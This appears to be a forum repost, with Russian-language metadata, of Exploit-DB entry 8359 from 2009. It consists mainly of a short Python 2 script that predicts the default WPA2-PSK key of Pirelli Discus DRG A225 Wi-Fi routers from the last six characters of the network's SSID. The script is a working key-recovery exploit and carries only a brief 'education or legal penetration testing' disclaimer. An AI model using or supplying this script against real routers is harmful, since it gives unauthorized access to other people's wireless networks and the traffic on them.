- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8359
- Проверка EDB
-
- Пройдено
- Автор
- J0RGAN
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- null
- Дата публикации
- 2009-04-06
Код:
#!/usr/bin/python
#
# Pirelli Discus DRG A225 WiFi router
# Default WPA2-PSK algorithm vulnerability
#
# paper: http://milw0rm.com/papers/313
#
# With this code we can predict the WPA2-PSK key...
#
# Hacked up by Muris Kurgas aka j0rgan
# j0rgan (-@-) remote-exploit.org
# http://www.remote-exploit.org
#
# Use for education or legal penetration testing purposes.....
#
import sys
def hex2dec(s):
return int(s, 16)
if len(sys.argv) < 2 or len(sys.argv[1]) != 6:
print "\r\nEnter the last 6 chars from Discus SSID"
print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n"
exit()
const = hex2dec('D0EC31')
inp = hex2dec(sys.argv[1])
result = (inp - const)/4
print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result)
# milw0rm.com [2009-04-06]
- Источник
- www.exploit-db.com